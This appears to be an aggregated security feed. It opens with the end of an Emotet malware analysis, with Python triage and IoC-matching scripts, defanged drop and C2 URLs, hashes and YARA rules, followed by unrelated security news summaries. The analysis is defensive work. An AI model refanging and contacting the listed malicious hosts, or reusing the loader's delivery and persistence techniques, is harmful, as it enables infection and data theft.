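    p = urlsplit(url)
    scheme = p.scheme.replace("http", "hxxp")
    tail = p.path + (f"?{p.query}" if p.query else "")
    return f"{scheme}://{p.netloc.replace('.', '[.]')}{tail}"


def triage(cmdline: str):
    """Command line -> (decoded script, defanged drop URLs); (None, []) if no -enc."""
    b64 = find_encoded_command(cmdline)
    if b64 is None:
        return None, []
    script = decode_encoded_command(b64)
    return script, [defang(u) for u in extract_urls(script)]


if __name__ == "__main__":
    script, urls = triage(SAMPLE_CMDLINE)
    print(script)
    for u in urls:
        print("drop URL:", u)
```

Because the regex stops at '@', it works unchanged on loaders that keep the URL list in one string and split it at run time, as this one does; loaders that build URLs by concatenating fragments need a real deobfuscation pass first.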

According to VT, the final payload looks like Emotet, a banking trojan that steals credentials, cookies and cryptocurrency wallets. Emotet is also able to read saved credentials from the major browsers (Chromium, Firefox, Opera, Vivaldi), exfiltrate cookies, and send the collected victim information back to its command and control. But let's quickly check it.

Analysis of dropped and executed file (emotet)

Hash: de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216
Threat: Emotet, data exfiltration
Brief description: Dropped and executed by the previous stage
Ssdeep: 3072:2xUIvfl2nnKJFddS2TZGjRurmOEfRtaG/70Jfm4JuLYwO9/+Tl:2lvfUnKJFddhAjYrmOEpzcflQu1+

The dropped file (VT 12/69), grabbed from the drop URLs inside the previous PowerShell script, is an executable packed with custom routines that uses several techniques to hinder static and dynamic analysis. For example, it deletes the original file once executed, it resolves an unusually high number of APIs, and it resolves functions dynamically so that the import table reveals little to static analysis.

Emotet Depacked

While running, the analysed sample records a lot of information about the host machine. It asks for the local public IP address by querying an external resource, http[://185[.42[.221[.78:443/whoami.php, and finally pushes the collected information out to the external command and control servers (please refer to the IoC section for the complete C2 list).

Recorded Information

The sample starts a local service called khmerdefine and ensures its persistence by copying its file into c:\Windows\SysWOW64 and registering a system service set to start automatically. AV verdicts and plenty of static and traffic signatures confirm we are facing a new encrypted version of the Emotet trojan.

Conclusion

The Emotet gang is getting smarter and smarter at delivering its artifacts. This time they targeted companies that have an external Security Operation Center (SOC), impersonating an external SOC operator who sends periodic reports to the company. The delivery vehicle was a Microsoft Word document with heavily obfuscated macros which eventually drops and executes the Emotet malware. The following image shows the compiled MITRE ATT&CK matrix, which qualifies the stages and describes the overall behaviour.

MITRE ATT&CK

IoC

email:
grecia@ambientehomedecor.com

Hash:
6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7 (.doc)
de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216 (.exe)

Drop URLs:
http[://xsnonline[.us/blogs/4x466v/
http[://obbydeemusic[.com/aqoeivj4fd/us5htvn/
http[://veeplan[.com/wp-content/dW0o3RoJNG/
http[://wwwkmacobd[.com/u9r/
http[://aijdjy[.com/dup-installer/t0/

C2 (Emotet):
http[://186[.75[.241[.230/cone/loadan/splash/merge/
http[://186[.75[.241[.230/results/json/
http[://186[.75[.241[.230/balloon/json/
http[://186[.75[.241[.230/enable/arizona/splash/merge/
http[://186[.75[.241[.230/acquire/
http[://181[.143[.194[.138:443/health/splash/sess/merge/
http[://85[.104[.59[.244:20/enable/rtm/sess/merge/
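The indicators above are defanged in the page's own "[." style, so they need refanging before they can be matched against anything. The script below is an added example, not the author's code: it refangs a subset of the IoCs above (the full list is shortened for brevity), matches them against a constructed proxy log (timestamps, client addresses and the clean example.invalid traffic are made up; the malicious URLs are the page's), and, going one step beyond the list, flags the shape of the whoami.php call, plain HTTP to a raw IP on port 443, which is suspicious on its own even for an address that is not yet on any IoC list. The log format and the 203.0.113.9 host are assumptions for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Defanged indicators copied from the IoC section above (shortened here).
DEFANGED_IOCS = [
    "http[://xsnonline[.us/blogs/4x466v/",
    "http[://185[.42[.221[.78:443/whoami.php",
    "http[://186[.75[.241[.230/results/json/",
    "http[://85[.104[.59[.244:20/enable/rtm/sess/merge/",
]

# Constructed proxy log (not from the page): timestamp client method url status.
SAMPLE_PROXY_LOG = """\
2019-10-12T09:14:03Z 10.0.8.23 GET http://www.example.invalid/index.html 200
2019-10-12T09:14:11Z 10.0.8.23 GET http://xsnonline.us/blogs/4x466v/ 200
2019-10-12T09:14:19Z 10.0.8.23 POST http://185.42.221.78:443/whoami.php 200
2019-10-12T09:16:40Z 10.0.8.23 POST http://186.75.241.230/balloon/json/ 200
2019-10-12T09:20:01Z 10.0.8.41 GET http://www.example.invalid/news/ 200
2019-10-12T09:21:37Z 10.0.8.41 POST http://203.0.113.9:443/gate.php 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a real URL string.

    Handles 'hxxp', '[.]', '(.)' and the bracket-only '[.' / '[://' style
    used in the IoC list on this page.
    """
    s = re.sub(r"^hxxp", "http", ioc, flags=re.IGNORECASE)
    s = s.replace("[.]", ".").replace("(.)", ".").replace("[.", ".")
    s = s.replace("[://", "://").replace("[:]", ":")
    return s


def _split(url: str):
    """(host[:port], path) with the host lower-cased for comparison."""
    p = urlsplit(url)
    return p.netloc.lower(), (p.path or "/")


def build_index(defanged):
    """Return (set of (host, path) IoCs, set of hosts) for fast lookups."""
    full, hosts = set(), set()
    for ioc in defanged:
        host, path = _split(refang(ioc))
        full.add((host, path))
        hosts.add(host)
    return full, hosts


def plain_http_to_ip_on_tls_port(url: str) -> bool:
    """Emotet's public-IP lookup was plain HTTP to a raw IP on :443; flag that
    shape even when the address is not on any IoC list."""
    p = urlsplit(url)
    if p.scheme != "http" or p.port != 443:
        return False
    try:
        ipaddress.ip_address(p.hostname)
    except ValueError:
        return False
    return True


def match_proxy_log(log_text: str, defanged):
    """Scan proxy lines and return a list of (client, url, reason) hits."""
    full, hosts = build_index(defanged)
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than crash mid-scan
        _ts, client, _method, url, _status = m.groups()
        host, path = _split(url)
        if (host, path) in full:
            hits.append((client, url, "exact IoC URL"))
        elif host in hosts:
            # C2 paths rotate; a known host with a new path is still a hit.
            hits.append((client, url, "IoC host, new path"))
        elif plain_http_to_ip_on_tls_port(url):
            hits.append((client, url, "plain HTTP to raw IP on 443"))
    return hits


if __name__ == "__main__":
    for client, url, reason in match_proxy_log(SAMPLE_PROXY_LOG, DEFANGED_IOCS):
        print(f"{client}  {reason:28}  {url}")
```

Matching on host as well as on the full URL matters for Emotet in particular: the C2 list above shows the same address serving several paths, and the paths change between builds while the infrastructure lingers.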

Yara Rules

import "pe"

rule EMOTET_SOC_EXE {
   meta:
      date = "2019-10-13"
      hash1 = "de6a8b8612b5236a18eea1a6a8f53e117d046cf2ad95e079a6715af68f8d2216"
   strings:
      $x1 = "c:\\Users\\User\\Desktop\\2003\\Efential\\Release\\EFENTIAL.pdb" fullword ascii
      $s2 = "EFENTIAL.exe" fullword ascii
      $s3 = "ZNtlsIkbp2bxIIBXLbRtd3e85g7mJ73gSFPnybocDj/xsKVPWxzllXY/FdB150/ewzkkdzDw5VMbiVfS/SPd0FlXp+VqpDpPDXxNH3cc9TXXa53EGeMfGnsPa3chxKVv" ascii
      $s4 = "tblJgbnpgZmZCaHxmfEpoaS9Cb31DfHpZfVJobW5SYG56YGZmQmh8ZnxKaGkvQm99Q3x6WX1SaG1uUmBuemBmZkJofGZ8SmhpL0JvfUN8ell9UmhtblJgbnpgZmZCaHx" ascii /* base64 encoded string 'nR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|f|Jhi/Bo}C|zY}RhmnR`nz`ffBh|' */
      $s5 = "C9813Hcfx1BkY3VrYVwfB4tWs+/Eb93UVwdvrbdywicNqMdPSiMzJFXbZbSLG6cDA/O9Vy2ob3d3PeVLcie95EpT50oKkSE/8bynT1sLOWCoPxXUd+dPO6BKhHcwzOdT" ascii
      $s6 = "G+MfTPu8J3chkKdvVwmN7R/fNdx3H8cxWUFva2FcHweLIPfrnG/d1FcHb/FxEOQnDajHT0qu26c122W0ixunZpkE2lctqG93dy4Z7jMnveRKU+dp33WJP/G8p09bPG/N" ascii
      $s7 = "RSVloG9h6HM56NP1tCMFZKs69gEEW+JoiOCz9U3uI3uYsb+mL2+97Wf903wpFDCKiBjjtt/TznbwXOcnHS87rh7rG4N2wHiRqPj2AReKM+CICO5NSlNOxut2wHOnb5dY" ascii
      $s8 = "iOC7W7cnZWhtQTw5nu3bSa/eHxvVFB3RfZP9CFkKs3KWazNkXJPk+HTPmTvpWFcnpLn2DUFtp2v1ELP9acqRoKOXIXMJCNtYpiEdTEP7nzdBU8UoA538OfhEk+kUzQrb" ascii
      $s9 = "6RzgkjSOWDNk6FtXIb1gBQ0oTx93sMelCVJYrG9ZEJB07FiwoYhZkKiSkNh3DQweyOCz9UXEmKjkHOXYfeRY2qT4p4UUBtCIA0+o00Fj/JSM4I+AkgRrpYTr7rS9V9wV" ascii
      $s10 = "StOEJiPbZbiKG6dLTcWrVy28bnd3MRHI6Se9+EtT5xnfnbI/8aimT1vHvvS1PxXYdudP5QazN3cw+OZTG6WMoPkj3ehaV6ftpUvyTw1ETh9335+9tGudzBrjH0t/zLV3" ascii
      $s11 = "mQOhiAgYsPyI4DhFgdYtLdGQ1W9Bxmd6m3lnTJcfr4gYGLD8iOA41oOuIaXdCNnnTaphWJ1HYWqR+qqIKBiwmIjgOPiFFCgT1NbQLUTYb0KTUW+UkPeoybBtiGSwewAX" ascii
      $s12 = "Jd812HQfx5Qv5tVrYSAcB4t1CVi1b93QVAdvpSmDyCcNpMRPSpcCbzzbZbCIG6fu/FMSVy20bHd3ShSspye94ElT56m+fUo/8bCkT1t+Me1nPxXQdOdPGL1DQHcw8ORT" ascii
      $s13 = "f64odyFEoG9XrrnC4d81EHAfx9MLlPdrYegYB4s9h95Cb91oUAdvuYg3nCcNHMBPSk5z9mnbZfiNG6fklZhYVy38aXd3FwtmSie9uExT54d2bFE/8eihT1swM44GPxWY" ascii
      $s14 = "G5WtAP8+00dbvQhs6PgZzXSo8WjM1YD2S2wk9prpUJn8oG0I4laYrNKGZTi4kPTVMKbGcImVZllhx5Tj+amkWDhXp2+bKhvFcO9Gasz1gDixo1+XH24Fpyq/01X5aw0b" ascii
      $s15 = "3ie9qEhT593fXyw/8filT1s1hgetPxWodedPR5foK3cwiOVTG/Eyi+Yj3ZhZV6cVyoNtTw00TR93mxbYI2udnBnjHxLYp+x3IZylb1e4qIYS3zXYdR/HAZflQmthIB0H" ascii
      $s16 = "RpFqNpYQapubxqPNu6yDXrsXC6qB7CzF0GzVj0FjbT6RdW15ncWnY7/vh92xHgE5j7MjB9mZ3mVK5FiwlKhYoKj4kIq4A4DduIQLc4bcLK/RsNUFQeBu9pLlbsmemKY/" ascii
      $s17 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s18 = "5Ewf7cgaGLAv7VSjeroTTJAjcpy+a7Ql2VPnU2HVntv/mUgzY6rVrB/TYQX35L9Xj+N9SPwkjLT2k+D48S0nWy/tVNKTKO5FA2W4Yy0Mxk9KrCt+b2nse4rmJKmXYRaT" ascii
      $s19 = "iBunjDe9gVct7Gx3d65SQF8nvahJU+cRqKveP/H4pE9bLL3YAz8VqHTnT7v1JHR3MIjkUxv0uwvjI92YWFenoW2yzU8NNEwfd/JCOHlrnZwY4x9adVfbdyGcpG9X8DDB" ascii
      $s20 = "pKjTapsqZ36hVbhZOPU4sD5ekeEYE2WaixuncUK41ZSfp87TA/3tI91r1DvwoBcDoQywknwbTexd6FjAV+2Ac8gY7SPda9RPwKByrBsJvAE05AhPsWyl0KilUwtkCFjk" ascii
   condition:
      uint16(0) == 0x5a4d and filesize < 800KB and
      ( pe.imphash() == "ffcd1ab4ae5e052202d6af1ea2767498" or ( 1 of ($x*) or 4 of them ) )
}

// Matches the OLE (.doc) first-stage dropper, not a PE file, despite the rule name.
rule EMOTET_SOC_PE {
   meta:
      date = "2019-10-13"
      hash1 = "6125489453c1824da3e28a54708e7c77875e500dd82a59c96c1d1e5ee88dcad7"
   strings:
      $x1 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
      $x2 = "Customer50041 Keeling Bypass, North Christellefort, Tunisia Global128 Manuel Stravenue, New Nicholasfort, Montserrat" fullword ascii
      $x3 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
      $x4 = "Forward297 German Trail, West Miloshire, Germany Product44796 Chesley Bypass, East Santos, Antigua and Barbudan" fullword ascii
      $x5 = "Regional1198 Rahsaan Motorway, Klockoburgh, Czech Republic Human326 Olson Bypass, North Nicholaus, Zimbabwe" fullword ascii
      $x6 = "Dynamic6743 Hickle Bypass, West Karliborough, United States Minor Outlying Islands Product6344 Zieme Inlet, Gloverfurt, Taiwan" fullword ascii
      $x7 = "*\\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd#Microsoft Forms" wide
      $s8 = "Central080 Ari Ranch, Port Sarinachester, Saint Vincent and the Grenadines Product4773 Cornelius Ford, Maybelleville, Morocco" fullword ascii
      $s9 = "Senior75970 Kiehn Brook, Port Joaquin, Comoros Forward6656 Parker Extension, Halvorsonton, Zambia" fullword ascii
      $s10 = "6868686868686868686868" ascii /* reversed goodware string '8686868686868686868686' */ /* hex encoded string 'hhhhhhhhhhh' */
      $s11 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
      $s12 = "Dynamic98251 Karli Mission, Deronhaven, Democratic People's Republic of Korea Chief1365 Hermann Passage, Rickyport, Oman24 " fullword ascii
      $s13 = "Forward0973 Nienow Dam, Walkermouth, Egypt Customer976 MacGyver Mountain, Schoentown, Northern Mariana Islands+ Lo " fullword ascii
      $s14 = "Corporate28089 Etha Bypass, Jastbury, Turkmenistan Dynamic764 Price Cliffs, Welchtown, Algeriaog(1 " fullword ascii
      $s15 = "National4629 Brianne Locks, Port Shadburgh, Bangladesh Forward481 Ashton Course, Lake Judson, Pakistana Pr" fullword ascii
      $s16 = "Forward563 Sasha Mountains, Nitzschestad, Palau Lead58549 Lesch Parkways, Port Archburgh, Burundi" fullword ascii
      $s17 = "Forward00009 Labadie Valley, Lake Othaview, Brunei Darussalam Future796 Fritsch Road, Mertzchester, Montserrat1831 " fullword ascii
      $s18 = "Central9007 Leland Isle, Laurynview, Morocco Product75313 Mueller Harbors, West Nakiafort, Lithuania+ Log( " fullword ascii
      $s19 = "Regional973 Aubrey Squares, South Simoneville, Svalbard & Jan Mayen Islands Dynamic7842 Madilyn Course, O'Harastad, Armenia" fullword ascii
      $s20 = "Lead7617 Nicolas Meadows, West Odell, Saint Pierre and Miquelon Product9412 Stamm Cove, South Katlynnport, Comoros " fullword ascii
   condition:
      uint16(0) == 0xcfd0 and filesize < 900KB and
      1 of ($x*) and 4 of them
}


Analysis reveals the most common causes behind mis-issued SSL/TLS certificates

We should be able to trust public key certificates, but this is the real world: mistakes and “mistakes” happen. Researchers from Indiana University Bloomington have analyzed 379 reported instances of failures in certificate issuance to pinpoint the most common causes as well as systemic issues that contribute to these happening. About public key certificates A public key certificate (aka digital certificate) proves that an individual, entity or a device is the rightful owner and user … More

The post Analysis reveals the most common causes behind mis-issued SSL/TLS certificates appeared first on Help Net Security.

Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF)

A shift to prioritize data security investments through a Data Security Governance Framework (DSGF) was among the top seven security and risk management trends identified by global research & advisory firm Gartner in 2019.

Breaking it down, the report observed that the changing security paradigm means enterprises need to identify other frameworks for protecting data. The first step is understanding the data the organization generates, by asking questions such as:

  • Why was this data created?
  • When was it created?
  • How will it be used?
  • Is this data compliant with the regulations my business needs to adhere to?
  • Can the original owner of the data make a request to get it deleted?

A framework for better data security

By answering these questions, enterprises can create a Data Security Governance Framework (DSGF) to better use and protect data. The research recommends this approach over acquiring data protection products and then trying to adapt them to a business need. A DSGF provides an organization-centric blueprint which classifies data assets and provides the bedrock for data security policies.

In this framework there is no one-size-fits-all solution. Every enterprise approaches data security case by case, working out its own data security requirements in order to find solutions that fit them.

The need for better alignment

The framework helps to balance the business need to maximize competitive advantage against the need to apply appropriate security policy rules. Adopting it will require greater collaboration within an enterprise's information security team on aligning approaches to data classification and lifecycle management. This involves classifying data according to the organization's own requirements: which dataset is the most important and requires the strongest protection?

Different businesses use different methods for protecting data –

Data Masking

A method through which data at rest or in motion is masked so that it is protected but remains usable. It helps organizations raise the level of security for sensitive data while conforming to privacy regulations and other compliance requirements.

Data Audit and Protection

This method uses active data controls, monitoring and logging to detect suspicious activity.

Unusual behaviour and anomalies are detected, flagged and acted upon immediately by blocking suspicious users from accessing critical data and alerting administrators. Access to data is separated according to users' roles.

A DSGF can be a useful tool for enterprises planning their data security investments and allocations. The framework helps an enterprise understand its own requirements clearly and make better investment decisions. Some of the key details a DSGF captures are:

  • Volume, veracity and variety details of each type of dataset
  • Business risks and financial impacts of each dataset
  • Data residency issues affecting each dataset, specifically as there are different data privacy laws for different geographies and jurisdictions
  • Asset management data
  • Consistent access and usage policies for different datasets

Rather than using technology to solve their data security issues, enterprises must ideally use the Data Security Governance Framework (DSGF) to understand and identify their own business requirements. Once the identification is conducted and a framework is created, it would then be prudent to identify the appropriate technology solution for an enterprise’s own data needs.

However, if you want expert consultation on your current framework, please contact us and we will be glad to advise you.

The post Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF) appeared first on Seqrite Blog.

5 things security executives need to know about insider threat

Insider threat is, unfortunately, an issue that has not yet received sufficient priority. According to the 2018 Deloitte-NASCIO Cybersecurity Study, CISOs’ top challenges remain “budget, talent and increasing cyber threats,” and to some, insider threat doesn’t even make the list of top-ten priorities. Considering what’s at stake – and our 21st-century ability to see signs of, and ultimately prevent, insider threat – this is a phenomenon security executives can no longer afford to ignore. Specifically, … More

The post 5 things security executives need to know about insider threat appeared first on Help Net Security.

New data analysis approach could strengthen the security of IoT devices

A multi-pronged data analysis approach that can strengthen the security of IoT devices, such as smart TVs, home video cameras and baby monitors, against current risks and threats has been created by a team of Penn State World Campus students. Explosion of IoT devices A new forecast from IDC estimates that there will be 41.6 billion connected IoT devices, or “things,” generating 79.4 zettabytes (ZB) of data in 2025. “These devices can leave people vulnerable … More

The post New data analysis approach could strengthen the security of IoT devices appeared first on Help Net Security.

Researchers may have found a way to trace serial IP hijackers

Hijacking IP addresses is an increasingly popular form of cyberattack. This is done for a range of reasons, from sending spam and malware to stealing Bitcoin. It’s estimated that in 2017 alone, routing incidents such as IP hijacks affected more than 10 percent of all the world’s routing domains. Left to right: senior research scientist David Clark, graduate student Cecilia Testart, and postdoc Philipp Richter. Photo by Jason Dorfman, MIT CSAIL. There have been major … More

The post Researchers may have found a way to trace serial IP hijackers appeared first on Help Net Security.

70% of presidential campaigns fail to provide adequate online privacy and security protections

An alarming 70% of the campaign websites reviewed in the OTA 2020 U.S. Presidential Campaign Audit failed to meet OTA’s privacy and security standards – potentially exposing visitors to unnecessary risks. Only seven (30%) of the analyzed campaigns made the Honor Roll, a designation recognizing campaigns that displayed a commitment to using best practices to safeguard visitor information. To qualify for the Honor Roll, campaigns must have an overall score of 80% or higher, with … More

The post 70% of presidential campaigns fail to provide adequate online privacy and security protections appeared first on Help Net Security.

Consumers concerned about connected home privacy, still few implement safety practices

In order to understand what people are doing to protect themselves from the risk of compromised smart home devices, such as internet-connected TVs, smart thermostats, home assistants and more, ESET polled 4,000 consumers. Key findings include: Over a third of all respondents indicated they are concerned about unauthorized access of their home networks via connected home devices (smart TVs, smart thermostats etc.). 35% of Americans and 37% of Canadians indicated so in our survey. When … More

The post Consumers concerned about connected home privacy, still few implement safety practices appeared first on Help Net Security.

Canadian SMBs incur a potential productivity loss of CA$2 billion using older technology 

A recent study commissioned by Microsoft and Intel reported that the cost of using a PC older than four years is more than buying a new one.  As per StatsCanada, the country is home to around 1.2 million small and medium businesses. These businesses comprise 98.8 per cent of the total employee businesses in the…

What is the kill chain and the seven steps involved in it?

The term ‘kill chain’ originated in the military as a concept to outline and define each stage of an attack. It has found its way into cybersecurity as a means to understand the structure of a cyber attack and disrupt it. There are seven defined phases in the kill chain, each with a specific utility to the attacker.

For enterprises waging a relentless war against attackers, it is essential to understand each stage of the kill chain in order to intervene at the right point and block the attack. Lockheed Martin, the American defense contractor, developed this model and in 2011 used it to detect and stop an intrusion that leveraged stolen RSA SecurID data.

Here are the seven phases that comprise the kill chain:

Phase 1: Reconnaissance

This phase involves both passive and active reconnaissance by the attacker. Identifying a vulnerable target is the main objective, and in pursuit of it attackers gather as much data and knowledge as they can about their targets. It is the preparation phase before the attack is launched.

Phase 2: Weaponization

Once reconnaissance is complete, the attacker moves on to Weaponization. In this phase the attacker builds the attack tool best suited to the target, based on the findings of the reconnaissance phase: typically an exploit for a discovered vulnerability coupled with a backdoor or other malware into a deliverable payload, such as a malicious document aimed at unpatched systems.

Phase 3: Delivery

The Delivery phase involves the attacker delivering the attack through a malicious payload. This payload can be delivered through a variety of means: a phishing email, a drive-by-download attack or spear phishing.

Phase 4: Exploitation

At the Exploitation phase, the attacker exploits the vulnerability that has been discovered to carry out their attack. The targeted system is typically compromised and the attack enters the system. At this stage, the attacker has already gained a foothold and may try to make further intrusions by installing other malware.

Phase 5: Installation

After the Exploitation phase, the Installation phase involves the malicious software being installed and multiplying inside the breached system. Users may unknowingly install and spread the malware on their systems by taking actions such as sending infected emails to other users. The breaches may multiply across the affected network.

Phase 6: Command & Control

At this stage, the attacker is in full control. After successfully gaining entry and breaching an enterprise’s defenses, the malware can be fully commanded and controlled by the attacker who can use it for any malicious purposes. This can include sending back confidential information, passwords, emails or anything else the attacker seeks.

Phase 7: Action on Objectives

This is the seventh and final stage of a cyber attack. This phase is defined as the ‘Action on Objectives’ phase and refers to the final actions an attacker takes once the attack has succeeded. An attack could have various goals – to extract a ransom through a ransomware attack, to sell data on the Dark Web or to leak confidential information to a rival enterprise.

It is important for enterprises to understand and remain prepared for each phase of a cyber attack. As outlined above, every phase is different and requires the corresponding action.

Seqrite’s solutions enable better protection at every stage and ensure enterprises stay secure against cyber attacks.

The post What is the kill chain and the seven steps involved in it? appeared first on Seqrite Blog.

DevSecOps role expansion has changed how companies address their security posture

While organizations shift their applications to microservices environments, the responsibility for securing these environments shifts as well, Radware reveals. The rapid expansion of the Development Security Operations (DevSecOps) role has changed how companies address their security posture, with approximately 70% of survey respondents stating that the CISO was not the top influencer in deciding on security software policy, tools and/or implementation. This shift has likely exposed companies to a broader range of security risks … More

The post DevSecOps role expansion has changed how companies address their security posture appeared first on Help Net Security.

11 steps organizations should take to improve their incident response strategy

As the year draws to a close, it is time for businesses across all industries and sectors to reflect and prepare for the upcoming new year. With this in mind, FIRST has produced 11 vital steps that organizations should take to improve their incident response strategy. It is highly likely that an organization will face a cybersecurity incident of some sort at some point in its lifetime, regardless of the level of cybersecurity defense in … More

The post 11 steps organizations should take to improve their incident response strategy appeared first on Help Net Security.

ICS cybersecurity investment should be a priority in protecting operations from disruption

93% of ICS security professionals are concerned about cyberattacks causing operational shutdown or customer-impacting downtime, according to a Tripwire survey. In an effort to prepare against such threats, 77% have made ICS cybersecurity investments over the past two years, but 50% still feel that current investments are not enough. The survey was conducted by Dimensional Research and its respondents included 263 ICS security professionals at energy, manufacturing, chemical, dam, nuclear, water, food, automotive and transportation … More

The post ICS cybersecurity investment should be a priority in protecting operations from disruption appeared first on Help Net Security.

Majority of Americans Fail Basic Cybersecurity Awareness

A newly released study from the Pew Research Center revealed most Americans are not aware of basic cybersecurity practices.

The study surveyed 4,272 American adults on a variety of technology-related issues and found that most of them struggled with basic cybersecurity concepts. Only 28 percent of respondents were familiar with two-factor authentication, and only 30 percent were aware that “https://” in a web address meant the connection was encrypted. Only 2 percent of those surveyed answered all ten questions correctly.

On privacy-related issues, the survey showed significant gaps in basic knowledge. Less than half of the subjects could correctly define privacy policies as “contracts between websites and users about how those sites will use their data,” and only 24 percent were aware that “private browsing” only hides online activities from other people using the same computer.

Adults with bachelor’s or advanced degrees tended to consistently score higher than those with high school educations or less. Respondents aged 18-29 also performed better than those above the age of 65, although the gap was smaller than that of the level of education achieved. 

The lack of awareness regarding https and two-factor authentication is perhaps most troubling, since there have been widespread efforts to encourage the use of https, and recently released data suggests two-factor authentication protects users against 99.9% of cyberattacks.

The findings of the study paint a bleak picture for cybersecurity in U.S. workplaces, where employee or contractor ignorance and negligence have consistently been one of the largest causes of data breaches for the last several years. 

See the Pew Research report here

 

The post Majority of Americans Fail Basic Cybersecurity Awareness appeared first on Adam Levin.

Watch Your Step: Insights on the TOMS Shoes Mailing Hack

You’re familiar with the cybercriminals that go after users’ credit card information and look to spread malicious links, but recently, one hacker decided to send a different message. According to Vice’s Motherboard, a hacker accessed TOMS Shoes’ mailing list and sent an email encouraging users to log off and go enjoy the outdoors.

The email specifically stated, “hey you, don’t look at a digital screen all day, theres a world out there that you’re missing out on.” The hacker claimed to have compromised TOMS a while back but never had any malicious intent and felt it had been too long to disclose the breach to the authorities. Although the hacker didn’t tell Motherboard how he or she specifically gained access to the TOMS account, they did voice their frustrations with hackers who steal data from large companies and innocent civilians.

Representatives from TOMS stated that they are actively looking into the breach and warned users to not interact with the message. And while this particular hacker had no malicious intent, users could have a potential phishing scam on their hands if these email addresses had ended up in the wrong hands.

So, whether you’re a TOMS shoe wearer or not, it’s important to stay updated on potential cyberthreats so you can recognize them immediately. Here are some tips to help you avoid accidentally treading on potential phishing emails:

  • Go directly to the source. Be skeptical of emails claiming to be from companies with peculiar asks or messages. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Be cautious of emails asking you to take action. If you receive an email asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links.
  • Hover over links to see and verify the URL. If someone sends you an email with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Watch Your Step: Insights on the TOMS Shoes Mailing Hack appeared first on McAfee Blogs.

Build or buy: What to consider when deploying on-premise or cloud-based PKI

Public Key Infrastructure (PKI), once considered an IT table stake, has transformed from a tool used to protect websites to a core digital identity management function within the cybersecurity framework. Today’s PKI establishes and manages digital identities across people, applications and devices within the enterprise. IT teams are deploying PKI to combat several growing cybersecurity threats too, from ransomware and phishing attacks to IoT device hijacking. PKI remains a core component within the larger IT … More

The post Build or buy: What to consider when deploying on-premise or cloud-based PKI appeared first on Help Net Security.

Cybercrime is maturing, shifting its focus to larger and more profitable targets

Cybercrime is continuing to mature and becoming more and more bold, shifting its focus to larger and more profitable targets as well as new technologies. Data is the key element in cybercrime, both from a crime and an investigate perspective. These key threats demonstrate the complexity of countering cybercrime and highlight that criminals only innovate their criminal behavior when existing modi operandi have become unsuccessful or more profitable opportunities emerge. In essence, new threats do … More

The post Cybercrime is maturing, shifting its focus to larger and more profitable targets appeared first on Help Net Security.

Only 32% of organizations employ a security-first approach to cloud data storage

Although nearly half (48%) of corporate data is stored in the cloud, only a third (32%) of organizations admit they employ a security-first approach to data storage in the cloud, according to a global study from Thales, with research from the Ponemon Institute. Surveying over 3,000 IT and IT security practitioners in Australia, Brazil, France, Germany, India Japan, the United Kingdom and the United States, the research found that only one in three (31%) organizations … More

The post Only 32% of organizations employ a security-first approach to cloud data storage appeared first on Help Net Security.

Does poor password hygiene still hamper your ability to achieve high security standards?

While more businesses are investing in security measures like multifactor authentication (MFA), employees still have poor password habits that weaken companies’ overall security posture, according to LastPass. Given that stolen and reused credentials are linked to 80 percent of hacking-related breaches, businesses must take more action to improve password and access security to make a big impact on risk reduction. “Securing employee access has never been more important and unfortunately, we see businesses ignore password … More

The post Does poor password hygiene still hamper your ability to achieve high security standards? appeared first on Help Net Security.

Impact and prevalence of cyberattacks that use stolen hashed administrator credentials

There’s a significant prevalence and impact of cyberattacks that use stolen hashed administrator credentials, also referred to as Pass the Hash (PtH) attacks, within businesses today, according to a survey from One Identity. Among the survey’s most noteworthy findings is that 95% of respondents say that PtH attacks have a direct business impact on their organizations. Conducted by Dimensional Research, the survey of more than 1,000 IT professionals reinforces the crucial need for organizations to … More

The post Impact and prevalence of cyberattacks that use stolen hashed administrator credentials appeared first on Help Net Security.

Winning the security fight: Tips for organizations and CISOs

For large organizations looking to build a robust cybersecurity strategy, failure to get the fundamentals in place practically guarantees a disaster. If you ask Matthew Rosenquist, a former Cybersecurity Strategist for Intel (now independent), overcoming denial of risk, employing the right cybersecurity leader, and defining clear goals are the three most critical objectives for avoiding a negative outcome. Getting things right “Every organization, large and small, begins with a belief they are not at significant … More

The post Winning the security fight: Tips for organizations and CISOs appeared first on Help Net Security.

Digital transformation requires an aggressive approach to security

